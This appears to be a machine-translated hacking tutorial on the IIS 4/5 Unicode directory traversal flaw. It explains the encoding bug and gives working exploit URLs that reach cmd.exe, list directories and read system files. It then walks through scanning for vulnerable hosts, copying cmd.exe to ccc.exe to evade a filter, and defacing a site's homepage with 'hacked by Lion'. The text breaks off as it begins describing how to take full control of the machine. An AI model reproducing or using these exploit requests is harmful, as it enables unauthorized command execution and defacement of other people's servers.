iis| Coding | Experience Everyone must know the scenery for a long time IIS5 UNICODE Coding Vulnerability Bar. No way, the first tutorial do not know what to write good, just make it,
Just write down the attack on this loophole.
1 First, let's take a look at the principle of this vulnerability.
In the Chinese version of IIS4, and ISS5, there is a bug because the Unicode encoding has bugs in Unicode encoding, and found a strange coding side
Expression
For example:
%c1%hh%c0%hh (0x00〈= 0xhh〈0x40)
IIS encodes "%c1%hh" into (0xc1-0xc0) * 0x40 + 0xhh.
For example
(Windows page + IIS 5.0 + SP1 Simplified Chinese):
Http://192.168.8.48/A.ida/%c1%00.ida
IIS will return "@.ida" Cannot find the file here (0xc1-0xc0) *0x40+0x00=0x40= ' @ '
Http://192.168.8.48/A.ida/%c1%01.ida
IIS will return "A.ida" could not find the file here (0xc1-0xc0) *0x40+0x01=0x41= ' A '
Http://192.168.8.48/A.ida/%c1%02.ida
IIS will return "B.ida" to find the file ....
Http://192.168.8.48/A.ida/%c0%21.ida
IIS will return "!. Ida "could not find the file
This means you can take advantage of these coding features.
For example:
%c1%1c-〉 (0xc1-0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f-〉 (0xc0-0xc0) * 0x40 + 0x2f = 0x2f = ' \ '
So we can go into some directories in this way.
(1) Http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
So we'll get
Directory of D:\inetpub\scripts
2000-09-28 15:49〈dir〉
. 1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
Counter.err 2000-08-23 23:07 160,002
Counter.exe 1999-05-25 18:14 3,925
countnt.html 1999-07-21 17:49 64,512
Extdgts.exe 2000-08-10 15:24 46,352
Ism.dll 1999-07-21 17:49 64,512
Mkstrip.exe 1999-05-25 18:181,317
README.txt 2000-09-28 15:49
〈dir〉wcount 9 File (s) 935,233 bytes
(2) We can also use this bug to get the contents of some system files
Http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS will treat it as a. ASP file submission. It will let Asp.dll to open the file Win.ini
If you use IIS 4.0+sp6 (Chinese version), you will not be able to test success but we can get it in the following ways.
Http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"Default.asp" is a presence. ASP file, "A.exe" is a random. EXE file name. It can not exist.
SP1 still have this coding problem.
Using%C1%AF in the English version can properly exploit this vulnerability.
2. Detailed information about the vulnerability. Let's talk about how to use it.
A. Using the Iisexploitsearcher software, we are looking for a host with this vulnerability.
Although this loophole has been published for a long time, you will still find that you can find many of these machines.
If we have found a machine with this loophole.
Let's do the following.
B.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
The execution of this URL statement is a command to execute a copy command using the command interpreter cmd.exe under nt/2000.
Copy C:\winnt\system32\cmd.exe Ccc.exe
It copies the C:\winnt\system32\cmd.exe to C:\inetpub\scripts\ccc.exe.
is the DOS command in the space, in the URL will be replaced by "+" number.
You're going to perform copy C:\winnt\system32\cmd.exe Ccc.exe
It corresponds to Http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe.
Which/scripts/. %c1%1c.. /WINNT/SYSTEM32/CMD.EXE?/C is fixed, and his role is to call C:\winnt\system32\cmd.exe to execute his life.
Make.
Oh, I forgot to tell you why I copied the Cmd.exe.
Because Microsoft's IIS loading program detected a string of Cmd.exe words to detect special characters "& (,;%<>), so must be renamed."
C. At this time C:\winnt\system32\cmd.exe has been copied to the C:\inetpub\scripts\ccc.exe
Pass
Http://ip/scripts/ccc.exe?/c
We can call the Cmd.exe, which means we don't need that code.
Http://ip/scripts/ccc.exe?/c+echo+hacked+by+lion+>+c:\inetpub\wwwroot\default.asp
Http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:\inetpub\wwwroot\default.asp
The main page has been modified to:
Hacked by Lion
20/10/2000
That is to say, has turned his homepage black.
: P
Here are some explanations.
Where Echo is a echoing command.
You play an echo hacked by Lion in DOS.
It is displayed on the screen
Hacked by Lion
More than that.
You can also let it write something into a file.
echo hacked by Lion > Lion.txt
So the Lion.txt file in the current directory has the words hacked by Lion.
The purpose of > Lion.txt is to write back the characters into the Lion.txt, which covers the original content.
If you want to use echo 20/10/2000 > Lion.txt to write what's left,
You will find that it covers the original content hacked by Lion.
What do we do? Don't worry!
echo hacked by Lion > Lion.txt
echo 20/10/2000 >> Lion.txt
Take a look.
Inside the file is
Hacked by Lion
20/10/2000
It worked.
In this way, you can use the above explanation, the space with "+" instead, you can to someone else's homepage to write anything.
Add a Point
A lot of site \inetpub\ under the Scripts directory deleted, but \program Files\Common Files\system\ under the MSADC still
(If you have a msadcs.dll loophole, you don't have to%c1%1c.)
You can then construct the request as follows:
Http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
You can call the Cmd.exe
3. Of course, we can't just stay on the Black homepage, of course, want to further control the entire machine.
: P
Here are a few ways to control the machine.
A. If C:\winn
